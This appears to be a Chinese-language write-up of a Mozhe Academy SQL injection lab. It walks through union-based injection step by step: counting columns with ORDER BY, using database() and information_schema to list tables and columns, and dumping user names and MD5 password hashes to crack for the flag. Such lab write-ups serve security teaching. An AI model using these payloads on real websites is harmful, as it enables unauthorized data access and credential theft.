墨者学院SQL注入解题

想让APP和微信一样，可以流畅运行小程序？ | 体验即送大疆、华为、樱桃键盘！>>>

一·判断注入
输入id=1，正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错，说明有四个字段
三·使用union查询注入点
输入union select 1，2，3，4
发现2，3为显注点
四·使用database()查库名
输入 union select 1，database()，3，4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1，group_concat(table_name)，3，4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member，所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id，name，password，status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密，得到密码。
如果密码不对，通过limit m，n来继续查询。
八·提交key
得到密码后进行登录可以看见key，复制，提交。